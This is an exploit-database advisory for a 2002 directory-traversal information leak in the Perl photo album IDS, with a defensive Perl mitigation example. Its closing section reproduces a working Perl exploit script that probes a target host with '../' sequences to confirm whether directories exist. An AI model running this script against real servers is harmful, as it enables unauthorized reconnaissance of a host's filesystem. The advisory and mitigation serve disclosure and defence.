Vendor: Image Display System
By: isox
CVSS: 7.5 (HIGH)
Type: Information Disclosure
CWE: 200
Product Name: Image Display System
Affected Version From: 0.8x
Affected Version To: 0.8x
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Perl
Year: 2002

IDS Information Disclosure Exploit

IDS (Image Display System) is a web-based photo album application written in Perl. This vulnerability allows attackers to confirm the existence and location of various directories residing on the IDS host. It is triggered by sending the host a request whose directory and album name contain numerous '../' character sequences. The error page returned indicates to the attacker whether the specified path is a valid directory or not.

Mitigation:

Ensure that the application is not vulnerable to directory traversal attacks by validating and sanitizing user input.
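
One way to apply this mitigation in a Perl CGI, as an added example that is not IDS code or part of the original advisory: the album parameter is allow-listed, canonicalised and confined to the album root, and every rejection gets the same response so the reply no longer reveals whether a path exists. The names `resolve_album`, `album_response`, the response strings and the temporary album root are hypothetical.

```perl
#!/usr/bin/perl
# Added example, not IDS code. resolve_album(), album_response() and the
# response strings are hypothetical names chosen for illustration.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Return the canonical album directory, or nothing for ANY failure.
sub resolve_album {
    my ($root, $album) = @_;
    return unless defined $album && length $album && length $album <= 255;

    # Allow-list: segments made of letters, digits, '_', space, '.', '-' only.
    return unless $album =~ m{\A[\w .-]+(?:/[\w .-]+)*\z};

    # Reject "." and ".." segments outright instead of trying to strip them.
    return if grep { $_ eq '.' || $_ eq '..' } split m{/}, $album;

    # Canonicalise (resolves symlinks) and confirm the result stays under root.
    my $real_root = realpath($root);
    my $real      = realpath(File::Spec->catdir($root, $album));
    return unless defined $real_root && defined $real && -d $real;
    return unless index($real, "$real_root/") == 0;
    return $real;
}

# One response for every rejection: a traversal attempt, a missing album and
# a path outside the root are indistinguishable to the client.
sub album_response {
    my ($root, $album) = @_;
    my $dir = resolve_album($root, $album);
    return defined $dir ? '200 album ok' : '404 album not found';
}

# Constructed test data: a temporary album root containing one album.
my $root = tempdir(CLEANUP => 1);
mkdir "$root/holiday" or die "mkdir: $!";

for my $album ('holiday', 'missing', ('../' x 30) . 'etc', ('../' x 30) . 'no-such-dir') {
    printf "%-40.40s -> %s\n", $album, album_response($root, $album);
}
```

Only `holiday` is served; the other three requests all receive the identical not-found response.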

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4870/info

IDS (Image Display System) is a web-based photo album application written in Perl. IDS is freely available and is maintained by Ashley M. Kirchner.

Users can confirm the existence and location of various directories residing on the IDS host. This is accomplished when a request for a directory and album name is sent to the host containing numerous '../' character sequences. The error page returned will indicate to the attacker whether the specified path is a valid directory or not. 

#!/usr/bin/perl -w
#
# ids-inform.pl (05/27/2002)
#
# Image Display System 0.8x Information Disclosure Exploit.
# Checks for existance of specified directory.
#
# By: isox [isox@chainsawbeer.com]
#
#
# usage: self explanitory
#
# my spelling: bad
#
# Hi Cody, You should be proud, I coded for you!
# Hi YpCat, Your perl is k-rad and pheersom.
#
#######
# URL #
#######
# http://0xc0ffee.com
# http://hhp-programming.net
#
#
#################
# Advertisement #
#################
#
# Going to Defcon X this year?  Well come to the one and only Dennys at Defcon breakfast.
# This is quickly becoming a yearly tradition put on by isox.  Check 0xc0ffee.com for
# more information.
#

$maxdepth = 30;

&Banner;

if ($#ARGV < 3) {
  die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>\n");
}

for($t=0; $t<$maxdepth; $t++) {
  $dotdot = "$dotdot" . "/..";
}

$query = "GET $ARGV[1]" . "?mode=album&album=$dotdot/$ARGV[0]\n\n";
$blahblah = &Directory($query, $ARGV[2], $ARGV[3]);

if($blahblah =~ /Sorry, invalid directory name/) {
  print("$ARGV[0] Exists.\n");
} else {
  print("$ARGV[0] Does Not Exist.\n");
}

exit 0;




sub Banner {
  print("IDS Information Disclosure Exploit\n");
  print("Written by isox [isox\@chainsawbeer.com]\n\n");
}


sub Directory {
  use IO::Socket::INET;

  my($query, $host, $port) = @_;

  $sock = new IO::Socket::INET (
            PeerAddr => $host,
            PeerPort => $port,
            Timeout => 8,
            Proto => 'tcp'
          );

  if(!$sock) {
    die("sock: timed out\n");
  }


  print $sock $query;
  read($sock, $buf, 8192);
  close($sock);

  return $buf;
}

<-- EOF -->